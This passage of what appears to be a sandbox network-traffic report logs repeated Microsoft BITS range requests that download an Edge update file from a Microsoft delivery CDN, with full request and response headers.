                Content-Range: bytes 92681037-97030436/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=97030437-103504834
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:16 GMT
                Content-Type: application/octet-stream
                Content-Length: 6474398
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c99c4cf-2915334016-103
                Ocn-Served-By: QLT
                Content-Range: bytes 97030437-103504834/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=103504835-106937506
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:18 GMT
                Content-Type: application/octet-stream
                Content-Length: 3432672
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c99f538-2915334016-104
                Ocn-Served-By: QLT
                Content-Range: bytes 103504835-106937506/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=106937507-109432546
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:19 GMT
                Content-Type: application/octet-stream
                Content-Length: 2495040
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9a119f-2915334016-105
                Ocn-Served-By: QLT
                Content-Range: bytes 106937507-109432546/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=109432547-115002990
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:21 GMT
                Content-Type: application/octet-stream
                Content-Length: 5570444
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9a4a97-2915334016-106
                Ocn-Served-By: QLT
                Content-Range: bytes 109432547-115002990/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=115002991-120918320
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:22 GMT
                Content-Type: application/octet-stream
                Content-Length: 5915330
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9a66b7-2915334016-107
                Ocn-Served-By: QLT
                Content-Range: bytes 115002991-120918320/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=120918321-126916849
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:24 GMT
                Content-Type: application/octet-stream
                Content-Length: 5998529
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9a83be-2915334016-108
                Ocn-Served-By: QLT
                Content-Range: bytes 120918321-126916849/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=126916850-133463335
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:25 GMT
                Content-Type: application/octet-stream
                Content-Length: 6546486
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9a9f4f-2915334016-109
                Ocn-Served-By: QLT
                Content-Range: bytes 126916850-133463335/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=133463336-139769766
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:26 GMT
                Content-Type: application/octet-stream
                Content-Length: 6306431
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9aba8f-2915334016-110
                Ocn-Served-By: QLT
                Content-Range: bytes 133463336-139769766/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=139769767-145943673
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:27 GMT
                Content-Type: application/octet-stream
                Content-Length: 6173907
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9ad6aa-2915334016-111
                Ocn-Served-By: QLT
                Content-Range: bytes 139769767-145943673/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=145943674-152097829
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:28 GMT
                Content-Type: application/octet-stream
                Content-Length: 6154156
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9af2be-2915334016-112
                Ocn-Served-By: QLT
                Content-Range: bytes 145943674-152097829/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=152097830-152372521
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:29 GMT
                Content-Type: application/octet-stream
                Content-Length: 274692
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9b16c4-2915334016-113
                Ocn-Served-By: QLT
                Content-Range: bytes 152097830-152372521/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=152372522-152434323
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:30 GMT
                Content-Type: application/octet-stream
                Content-Length: 61802
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9b31e7-2915334016-114
                Ocn-Served-By: QLT
                Content-Range: bytes 152372522-152434323/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=152434324-157425907
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:32 GMT
                Content-Type: application/octet-stream
                Content-Length: 4991584
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9b5f88-2915334016-115
                Ocn-Served-By: QLT
                Content-Range: bytes 152434324-157425907/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
